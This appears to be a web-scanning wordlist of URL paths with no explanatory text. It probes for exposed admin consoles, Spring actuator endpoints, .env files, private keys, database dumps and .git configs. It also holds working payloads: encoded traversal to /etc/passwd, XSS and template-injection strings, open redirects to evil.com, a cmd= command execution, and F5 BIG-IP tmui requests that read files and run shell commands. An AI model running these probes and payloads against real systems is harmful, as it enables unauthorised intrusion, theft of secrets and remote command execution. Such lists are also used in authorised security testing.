/+CSCOE+/logon.html
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%5c..%5c..%5c..%5cetc/passwd
/..%5c..%5c..%5cetc/passwd
/..%5c..%5cetc/passwd
/..%5cetc/passwd
/..;/examples/jsp/index.html
/..;/examples/servlets/index.html
/..;/examples/websocket/index.xhtml
/..;/manager/html
/./../../../../../../../../../../etc/passwd
/.composer/composer.json
/.env
/.env.dev.local
/.env.development.local
/.env.prod.local
/.env.production.local
/.htaccess
/.htpasswd
/.redmine
/.settings/rules.json?auth=FIREBASE_SECRET
/.svn/entries
/.svn/prop
/.svn/text
/.well
/////evil.com
///evil.com/%2F..
//admin/
//anything/admin/
//evil.com/%2F..
//evil.com/..;/css
/_cat/health
/_cat/indices
/_cluster/health
/abs/
/access/config
/actuator/auditevents
/actuator/auditLog
/actuator/beans
/actuator/caches
/actuator/conditions
/actuator/configprops
/actuator/configurationMetadata
/actuator/dump
/actuator/env
/actuator/events
/actuator/exportRegisteredServices
/actuator/features
/actuator/flyway
/actuator/healthcheck
/actuator/heapdump
/actuator/httptrace
/actuator/hystrix.stream
/actuator/integrationgraph
/actuator/jolokia
/actuator/liquibase
/actuator/logfile
/actuator/loggers
/actuator/loggingConfig
/actuator/management
/actuator/mappings
/actuator/metrics
/actuator/refresh
/actuator/registeredServices
/actuator/releaseAttributes
/actuator/resolveAttributes
/actuator/scheduledtasks
/actuator/sessions
/actuator/shutdown
/actuator/springWebflow
/actuator/sso
/actuator/ssoSessions
/actuator/statistics
/actuator/status
/actuator/threaddump
/actuator/trace
/actuators/
/actuators/dump
/actuators/env
/actuators/health
/actuators/logfile
/actuators/mappings
/actuators/shutdown
/actuators/trace
/adfs/services/trust/2005/windowstransport
/adjuncts/3a890183/
/admin../admin
/admin/
/Admin/
/admin/../admin
/admin//phpmyadmin/
/admin/adminer.php
/admin/error.log
/admin/errors.log
/admin/index.php
/admin/log/error.log
/admin/login
/admin/login.html
/admin/login/?next=/admin/
/admin/logs/error.log
/admin/logs/errors.log
/admin/views/ajax/autocomplete/user/a
/admin;/
/Admin;/
/adminadminer.php
/adminer.php
/adminer/
/adminer/adminer.php
/adminer/index.php
/ADSearch.cc?methodToCall=search
/aims/ps/
/airflow.cfg
/AirWatch/Login
/alps/profile
/altair
/ansible.cfg
/apache
/apc.php
/apc/apc.php
/api
/api/__swagger__/
/api/_swagger_/
/api/api
/api/apidocs
/api/apidocs/swagger.json
/api/application.wadl
/api/cask/graphql
/api/docs/
/api/index.html
/api/jsonws
/api/jsonws/invoke
/api/profile
/api/spec/swagger.json
/api/swagger
/api/swagger.json
/api/swagger.yaml
/api/swagger.yml
/api/swagger/index.html
/api/swagger/static/index.html
/api/swagger/swagger
/api/swagger/ui/index
/api/whoami
/app/etc/local.xml
/app/kibana/
/application.wadl?detail=true
/asdf.php
/assets../.git/config
/asynchPeople/
/auditevents
/aura
/auth.html
/authorization.do
/autoconfig
/autodiscover/
/autoupdate/
/backup.sql
/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/blog/phpmyadmin/
/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB
/bundles/kibana.style.css
/bundles/login.bundle.js
/cacti/
/certenroll/
/certprov/
/certsrv/
/CgiStart?page=Single
/ckeditor/samples/
/cloudfoundryapplication
/cluster/cluster
/composer.lock
/conf/
/config/database.yml
/config/databases.yml
/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E
/configprops
/console
/content../.git/config
/control/login
/controller/config
/controller/registry
/counters
/cp/Shares?user=&protocol=webaccess&v=2.3
/crossdomain.xml
/crowd/console/login.action
/crx/de/index.jsp
/css../.git/config
/CTCWebService/CTCWebServiceBean
/CTCWebService/CTCWebServiceBean?wsdl
/dashboard/
/data.sql
/data/adminer.php
/database.sql
/db.sql
/dbdump.sql
/dfshealth.html
/dialin/
/dispatcher/invalidate.cache
/Dockerrun.aws.json
/domcfg.nsf
/druid/coordinator/v1/leader
/druid/coordinator/v1/metadata/datasources
/druid/index.html
/druid/indexer/v1/taskStatus
/dump
/dump.sql
/eam/vib?id=/etc/issue
/ecp/
/editor/ckeditor/samples/
/elmah.axd
/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E
/emergency.php
/error.log
/error.txt
/error/error.log
/errors.log
/errors.txt
/errors/errors.log
/etc/
/events../.git/config
/evil%E3%80%82com
/evil.com/
/evil.com//
/ews/
/examples/jsp/index.html
/examples/jsp/snp/snoop.jsp
/examples/servlets/index.html
/examples/websocket/index.xhtml
/exchange/
/exchweb/
/explore
/express
/fckeditor/_samples/default.html
/filezilla.xml
/FileZilla.xml
/filter/jmol/iframe.php?_USE=%22};alert(1337);//
/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file
/flow/registries
/forum/phpmyadmin/
/fw.login.php
/gallery/zp
/global
/gotoURL.asp?url=google.com&id=43569
/graphiql
/graphiql.css
/graphiql/finland
/graphql
/graphql.php
/graphql/graphql
/graphql/schema.json
/graphql/schema.xml
/graphql/schema.yaml
/groovyconsole
/groupexpansion/
/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E
/health
/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/homepage.nsf
/host.key
/hybridconfig/
/HyperGraphQL
/hystrix.stream
/i.php
/IdentityGuardSelfService/
/IdentityGuardSelfService/images/favicon.ico
/images../.git/config
/img../.git/config
/index.htm
/index.jsp
/index.php/admin/
/INF/maven/com.atlassian.jira/atlassian
/info.php
/infophp.php
/install.php?profile=default
/installer
/invoker/EJBInvokerServlet/
/invoker/JMXInvokerServlet
/invoker/JMXInvokerServlet/
/ipython/tree
/irj/portal
/jasperserver/login.html?error=1
/jira/secure/Dashboard.jspa
/secure/QueryComponent!Default.jspa
/jkstatus/
/jmx
/jolokia
/jolokia/exec/ch.qos.logback.classic
/jolokia/list
/jolokia/version
/josso/%5C../invoker/EJBInvokerServlet/
/josso/%5C../invoker/JMXInvokerServlet/
/js../.git/config
/key.pem
/laravel
/lfm.php
/lib../.git/config
/localhost.sql
/log/error.log
/log/errors.log
/logfile
/loggers
/login.jsp
/login?next=%2F
/logon/LogonPoint/custom.html
/logon/LogonPoint/index.html
/logs/error.log
/logs/errors.log
/lol/graphql
/management
/manager/html
/mappings
/mcx/
/mcx/mcxservice.svc
/media../.git/config
/meet/
/meeting/
/mgmt/tm/sys/management
/microsoft
/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https
/mifs/c/d/android.html
/mifs/login.jsp
/mifs/user/login.jsp
/mrtg/
/MRTG/
/my.key
/mysql.sql
/mysqldump.sql
/oab/
/ocsp/
/opcache
/Orion/Login.aspx
/owa/
/owncloud/config/
/package
/package.json
/perl
/persistentchat/
/phoneconferencing/
/php
/php.php
/php/adminer.php
/php/phpmyadmin/
/phpinfo.php
/phpmyadmin/
/phpversion.php
/pinfo.php
/playground
/plugins/servlet/gadgets/makeRequest?url=https://google.com
/PMUser/
/pods
/portal
/powershell/
/private
/privatekey.key
/profile
/provider.tf
/PRTG/index.htm
/prtg/index.htm
/public/
/public/adminer.php
/publicadminer.php
/query
/rails/actions?error=ActiveRecord
/reach/sip.svc
/remote/login
/Reports/Pages/Folder.aspx
/requesthandler/
/requesthandlerext/
/rest/api/2/dashboard?maxResults=100
/rest/api/2/project?maxResults=100
/rest/tinymce/1/macro/preview
/rgs/
/rgsclients/
/robots.txt%2e%2e%3B/
/robots.txt..%3B/
/robots.txt../admin/
/robots.txt..;/
/robots.txt/%2e%2e%3B/
/robots.txt/..%3B/
/robots.txt/../admin/
/robots.txt/..;/
/rpc/
/rpcwithcert/
/s/sfsites/aura
/sap/hana/xs/formLogin/login.html
/scheduler/
/schema
/search?search_key={{1337*1338}}
/secure/ConfigurePortalPages!default.jspa?view=popular
/secure/Dashboard.jspa
/secure/ManageFilters.jspa?filter=popular&filterView=popular
/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false
/secure/popups/UserPickerBrowser.jspa
/security.txt
/server
/server.key
/servicedesk/customer/user/login
/servicedesk/customer/user/signup
/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https
/sessions/new
/sfsites/aura
/shutdown
/sidekiq
/site.sql
/sitemanager.xml
/solr/
/sphinx
/sql.sql
/sslmgr
/stat.jsp?cmd=chcp+437+%7c+dir
/static%2e%2e%3B/
/static..%3B/
/static../.git/config
/static../admin/
/static..;/
/static/%2e%2e%3B/
/static/..%3B/
/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/static/..%5c..%5c..%5c..%5c..%5cetc/passwd
/static/..%5c..%5c..%5c..%5cetc/passwd
/static/..%5c..%5c..%5cetc/passwd
/static/..%5c..%5cetc/passwd
/static/..%5cetc/passwd
/static/../admin/
/static/..;/
/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E
/status/selfDiscovered/status
/store/app/etc/local.xml
/swagger
/swagger/swagger
/system
/systemstatus.xml
/Telerik.Web.UI.DialogHandler.aspx
/Telerik.Web.UI.WebResource.axd?type=rau
/temp.sql
/test.php
/threaddump
/tiki
/time.php
/tmui/login.jsp
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
/tmui/tmui/login/welcome.jsp
/tools/adminer.php
/toolsadminer.php
/trace
/Trace.axd
/translate.sql
/ucwa/
/ueditor/php/getRemoteImage.php
/unifiedmessaging/
/user/0
/user/1
/user/2
/user/3
/userportal/webpages/myaccount/login.jsp
/users.sql
/vendor/composer/installed.json
/views/ajax/autocomplete/user/a
/virtualems/Login.aspx
/VirtualEms/Login.aspx
/vpn/index.html
/web.config
/web/adminer.php
/web/phpmyadmin/
/webadmin/start/
/webadminer.php
/webalizer/
/webclient/Login.xhtml
/webconsole/webpages/login.jsp
/webmin/
/webticket/
/webticket/webticketservice.svc
/webticket/webticketservice.svcabs/
/www.key
/xampp/phpmyadmin/
/xmlrpc.php
/xprober.php
/zenphoto/zp
/zipkin/
/zp
/zp/zp
